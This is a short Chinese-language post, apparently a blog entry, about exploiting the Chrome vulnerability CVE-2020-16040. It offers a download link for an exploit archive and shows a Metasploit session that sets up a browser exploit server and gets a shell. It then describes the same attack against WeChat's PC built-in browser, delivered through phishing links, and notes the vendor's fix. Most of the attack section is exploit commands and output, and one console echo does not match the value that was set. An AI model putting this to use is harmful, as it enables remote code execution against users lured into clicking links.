HW期间热新闻
漏洞详情CVE:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16040
本地测试环境:WinServ2012+Google Chrome 87.0.4280.66 (64 bit)
[dl href=“taoreset.cn:93/s/9EymD4P33Ed39J7”]CVE-2020-16040.zip[/dl]
//测试关闭chrome沙箱环境
//加载rb脚本后,show targets命令查看受攻击目标,可以看到三个平台都受威胁
//配置攻击参数
msf5 > use exploit/multi/browser/chrome_simplifiedlowering_overflow
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvport 80
srvport => 80
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set uripath /
uripath => /
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvhost 0.0.0.0
srvhost => 127.0.0.1
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set lhost YourIP
lhost => 127.0.0.1
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > run
//配置如图
//运行run,开启本地端口监听
//使用浏览器访问后,监听建立
//进入shell成功,权限为用户的权限
在hw期间,青藤爆出了因为此而造成的微信pc端漏洞,原因为微信内置的浏览采用chrome,而且是关闭沙箱的,所以利用方法一致,可造成远程命令执行
通过伪造链接,钓鱼信息,被动使受害者点击链接,姿势多变
微信紧急更新了.143版本
新版本中,所有的链接将采用系统默认浏览器打开,而不再是微信内置的浏览器,避免了沙箱关闭的风险